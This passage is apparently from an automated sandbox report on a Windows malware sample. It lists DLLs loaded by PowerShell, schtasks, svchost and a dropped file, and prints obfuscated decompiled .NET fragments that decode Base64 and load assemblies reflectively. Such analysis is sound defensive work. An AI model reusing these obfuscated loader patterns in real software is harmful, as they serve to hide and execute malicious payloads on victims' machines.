                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                    Source: C:\ProgramData\codingSection loaded: mscoree.dll
                    Source: C:\ProgramData\codingSection loaded: apphelp.dll
                    Source: C:\ProgramData\codingSection loaded: kernel.appcore.dll
                    Source: C:\ProgramData\codingSection loaded: version.dll
                    Source: C:\ProgramData\codingSection loaded: vcruntime140_clr0400.dll
                    Source: C:\ProgramData\codingSection loaded: ucrtbase_clr0400.dll
                    Source: C:\ProgramData\codingSection loaded: ucrtbase_clr0400.dll
                    Source: C:\ProgramData\codingSection loaded: uxtheme.dll
                    Source: C:\ProgramData\codingSection loaded: sspicli.dll
                    Source: C:\ProgramData\codingSection loaded: cryptsp.dll
                    Source: C:\ProgramData\codingSection loaded: rsaenh.dll
                    Source: C:\ProgramData\codingSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: twinui.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: wintypes.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: dwmapi.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: pdh.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: umpdc.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: onecorecommonproxystub.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: actxprxy.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepositoryps.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.appdefaults.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.immersive.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: ntmarta.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: uiautomationcore.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: dui70.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: duser.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: dwrite.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: bcp47mrm.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: uianimation.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d11.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: dxgi.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: resourcepolicyclient.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: dxcore.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: dcomp.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: oleacc.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: edputil.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: windowmanagementapi.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: textinputframework.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: inputhost.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: windowscodecs.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: thumbcache.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: sxs.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: directmanipulation.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: textshaping.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: twinui.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: wintypes.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: dwmapi.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: pdh.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: umpdc.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: onecorecommonproxystub.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: actxprxy.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepositoryps.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.appdefaults.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.immersive.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: ntmarta.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: uiautomationcore.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: dui70.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: duser.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: dwrite.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: bcp47mrm.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: uianimation.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d11.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: dxgi.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: resourcepolicyclient.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: dxcore.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: dcomp.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: oleacc.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: edputil.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: windowmanagementapi.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: textinputframework.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: inputhost.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: windowscodecs.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: thumbcache.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: sxs.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: directmanipulation.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: textshaping.dll
                    Source: C:\ProgramData\codingSection loaded: mscoree.dll
                    Source: C:\ProgramData\codingSection loaded: kernel.appcore.dll
                    Source: C:\ProgramData\codingSection loaded: version.dll
                    Source: C:\ProgramData\codingSection loaded: vcruntime140_clr0400.dll
                    Source: C:\ProgramData\codingSection loaded: ucrtbase_clr0400.dll
                    Source: C:\ProgramData\codingSection loaded: ucrtbase_clr0400.dll
                    Source: C:\ProgramData\codingSection loaded: uxtheme.dll
                    Source: C:\ProgramData\codingSection loaded: sspicli.dll
                    Source: C:\ProgramData\codingSection loaded: cryptsp.dll
                    Source: C:\ProgramData\codingSection loaded: rsaenh.dll
                    Source: C:\ProgramData\codingSection loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32
                    Source: coding.lnk.3.drLNK file: ..\..\..\..\..\..\..\..\..\ProgramData\coding
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                    Source: YPzNsfg4nR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: YPzNsfg4nR.exeStatic PE information: Image base 0x140000000 > 0x60000000
                    Source: YPzNsfg4nR.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: YPzNsfg4nR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: \ConsoleApp4\obj\Release\net4.8\win-x64\1fht7W0d34QhN.pdbSHA256J source: YPzNsfg4nR.exe
                    Source: Binary string: \ConsoleApp4\obj\Release\net4.8\win-x64\1fht7W0d34QhN.pdb source: YPzNsfg4nR.exe

                    Data Obfuscation

                    Source: 24572628.exe.0.dr, 153GVkCW1JSY1j8x1OmHpbOpXJA.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{RWYlUp8SC4AqlyeOaRAKtexLHzJLkDNHPRoqbwLt7tyIWcVkPDeBP0TESEdQlABBp6uS3UFLvWhYnwTTrXH2z._5i4SAQhuc91ROiWCzo5Pf6RTeAh2vkXbKPbnZgcGS7EJ9WTQi380QHhzZ2TCuSLF2x7JzKBW5haPN8JirQ7i4,RWYlUp8SC4AqlyeOaRAKtexLHzJLkDNHPRoqbwLt7tyIWcVkPDeBP0TESEdQlABBp6uS3UFLvWhYnwTTrXH2z.WjOzvpLnp5VNZhNSe5arbH2DAbJgI32DSSRm8Ajkw0IPeUKxyIDS5YRZb7fT65eOdWNH4f5s5uEdYie3mF0Ws,RWYlUp8SC4AqlyeOaRAKtexLHzJLkDNHPRoqbwLt7tyIWcVkPDeBP0TESEdQlABBp6uS3UFLvWhYnwTTrXH2z._9eZ2cQYC4RGIU6SXHbNeKcevZLSx2jq4rUQDsoavnesEBTtfmmMid9ubLQZbrYsCPFAobvqaMOJDzFmmmVnSz,RWYlUp8SC4AqlyeOaRAKtexLHzJLkDNHPRoqbwLt7tyIWcVkPDeBP0TESEdQlABBp6uS3UFLvWhYnwTTrXH2z.wKABsnxs3jsj5dVuYrHC1DirE4MCFqTaC0iWPKFElnZhjbTVZ8bepZ817q0USmjPsMJVwHQOLR5QFZenR6B4E,OszBM2fJqaqDqfTYb3i92yMDtuZ.qkD9uNU4VX0eyH13IN643S6BNs7()}}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: 24572628.exe.0.dr, 153GVkCW1JSY1j8x1OmHpbOpXJA.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{uq8xTlDRinxDVb8hTq0qDdZr8bs[2],OszBM2fJqaqDqfTYb3i92yMDtuZ.nunvLMQGPjDFLCBkvQa4RNkS6pM(Convert.FromBase64String(uq8xTlDRinxDVb8hTq0qDdZr8bs[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: 0.2.YPzNsfg4nR.exe.208000a6c48.0.raw.unpack, 153GVkCW1JSY1j8x1OmHpbOpXJA.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{RWYlUp8SC4AqlyeOaRAKtexLHzJLkDNHPRoqbwLt7tyIWcVkPDeBP0TESEdQlABBp6uS3UFLvWhYnwTTrXH2z._5i4SAQhuc91ROiWCzo5Pf6RTeAh2vkXbKPbnZgcGS7EJ9WTQi380QHhzZ2TCuSLF2x7JzKBW5haPN8JirQ7i4,RWYlUp8SC4AqlyeOaRAKtexLHzJLkDNHPRoqbwLt7tyIWcVkPDeBP0TESEdQlABBp6uS3UFLvWhYnwTTrXH2z.WjOzvpLnp5VNZhNSe5arbH2DAbJgI32DSSRm8Ajkw0IPeUKxyIDS5YRZb7fT65eOdWNH4f5s5uEdYie3mF0Ws,RWYlUp8SC4AqlyeOaRAKtexLHzJLkDNHPRoqbwLt7tyIWcVkPDeBP0TESEdQlABBp6uS3UFLvWhYnwTTrXH2z._9eZ2cQYC4RGIU6SXHbNeKcevZLSx2jq4rUQDsoavnesEBTtfmmMid9ubLQZbrYsCPFAobvqaMOJDzFmmmVnSz,RWYlUp8SC4AqlyeOaRAKtexLHzJLkDNHPRoqbwLt7tyIWcVkPDeBP0TESEdQlABBp6uS3UFLvWhYnwTTrXH2z.wKABsnxs3jsj5dVuYrHC1DirE4MCFqTaC0iWPKFElnZhjbTVZ8bepZ817q0USmjPsMJVwHQOLR5QFZenR6B4E,OszBM2fJqaqDqfTYb3i92yMDtuZ.qkD9uNU4VX0eyH13IN643S6BNs7()}}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: 0.2.YPzNsfg4nR.exe.208000a6c48.0.raw.unpack, 153GVkCW1JSY1j8x1OmHpbOpXJA.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{uq8xTlDRinxDVb8hTq0qDdZr8bs[2],OszBM2fJqaqDqfTYb3i92yMDtuZ.nunvLMQGPjDFLCBkvQa4RNkS6pM(Convert.FromBase64String(uq8xTlDRinxDVb8hTq0qDdZr8bs[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: coding.3.dr, 153GVkCW1JSY1j8x1OmHpbOpXJA.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{RWYlUp8SC4AqlyeOaRAKtexLHzJLkDNHPRoqbwLt7tyIWcVkPDeBP0TESEdQlABBp6uS3UFLvWhYnwTTrXH2z._5i4SAQhuc91ROiWCzo5Pf6RTeAh2vkXbKPbnZgcGS7EJ9WTQi380QHhzZ2TCuSLF2x7JzKBW5haPN8JirQ7i4,RWYlUp8SC4AqlyeOaRAKtexLHzJLkDNHPRoqbwLt7tyIWcVkPDeBP0TESEdQlABBp6uS3UFLvWhYnwTTrXH2z.WjOzvpLnp5VNZhNSe5arbH2DAbJgI32DSSRm8Ajkw0IPeUKxyIDS5YRZb7fT65eOdWNH4f5s5uEdYie3mF0Ws,RWYlUp8SC4AqlyeOaRAKtexLHzJLkDNHPRoqbwLt7tyIWcVkPDeBP0TESEdQlABBp6uS3UFLvWhYnwTTrXH2z._9eZ2cQYC4RGIU6SXHbNeKcevZLSx2jq4rUQDsoavnesEBTtfmmMid9ubLQZbrYsCPFAobvqaMOJDzFmmmVnSz,RWYlUp8SC4AqlyeOaRAKtexLHzJLkDNHPRoqbwLt7tyIWcVkPDeBP0TESEdQlABBp6uS3UFLvWhYnwTTrXH2z.wKABsnxs3jsj5dVuYrHC1DirE4MCFqTaC0iWPKFElnZhjbTVZ8bepZ817q0USmjPsMJVwHQOLR5QFZenR6B4E,OszBM2fJqaqDqfTYb3i92yMDtuZ.qkD9uNU4VX0eyH13IN643S6BNs7()}}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: coding.3.dr, 153GVkCW1JSY1j8x1OmHpbOpXJA.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{uq8xTlDRinxDVb8hTq0qDdZr8bs[2],OszBM2fJqaqDqfTYb3i92yMDtuZ.nunvLMQGPjDFLCBkvQa4RNkS6pM(Convert.FromBase64String(uq8xTlDRinxDVb8hTq0qDdZr8bs[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: 24572628.exe.0.dr, 153GVkCW1JSY1j8x1OmHpbOpXJA.cs | .Net Code: A489ErlwV9A4dCeG59RzSh9kbzW System.AppDomain.Load(byte[])
                    Source: 24572628.exe.0.dr, 153GVkCW1JSY1j8x1OmHpbOpXJA.cs | .Net Code: _1YkqxFS5uSQpaKbGKVjN0u3j8hQ System.AppDomain.Load(byte[])
                    Source: 24572628.exe.0.dr, 153GVkCW1JSY1j8x1OmHpbOpXJA.cs | .Net Code: _1YkqxFS5uSQpaKbGKVjN0u3j8hQ
                    Source: 0.2.YPzNsfg4nR.exe.208000a6c48.0.raw.unpack, 153GVkCW1JSY1j8x1OmHpbOpXJA.cs | .Net Code: A489ErlwV9A4dCeG59RzSh9kbzW System.AppDomain.Load(byte[])
                    Source: 0.2.YPzNsfg4nR.exe.208000a6c48.0.raw.unpack, 153GVkCW1JSY1j8x1OmHpbOpXJA.cs | .Net Code: _1YkqxFS5uSQpaKbGKVjN0u3j8hQ System.AppDomain.Load(byte[])
                    Source: 0.2.YPzNsfg4nR.exe.208000a6c48.0.raw.unpack, 153GVkCW1JSY1j8x1OmHpbOpXJA.cs | .Net Code: _1YkqxFS5uSQpaKbGKVjN0u3j8hQ
                    Source: coding.3.dr, 153GVkCW1JSY1j8x1OmHpbOpXJA.cs | .Net Code: A489ErlwV9A4dCeG59RzSh9kbzW System.AppDomain.Load(byte[])
                    Source: coding.3.dr, 153GVkCW1JSY1j8x1OmHpbOpXJA.cs | .Net Code: _1YkqxFS5uSQpaKbGKVjN0u3j8hQ System.AppDomain.Load(byte[])
                    Source: coding.3.dr, 153GVkCW1JSY1j8x1OmHpbOpXJA.cs | .Net Code: _1YkqxFS5uSQpaKbGKVjN0u3j8hQ
                    Source: YPzNsfg4nR.exe | Static PE information: 0xA7BF61F9 [Sat Mar 8 08:25:29 2059 UTC]
                    Source: C:\Users\user\Desktop\24572628.exe | Code function: 3_2_00007FF848A400BD pushad ; iretd 3_2_00007FF848A400C1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FF84892D2A5 pushad ; iretd 4_2_00007FF84892D2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FF848A4B98C push ecx; retf 4_2_00007FF848A4B9F2
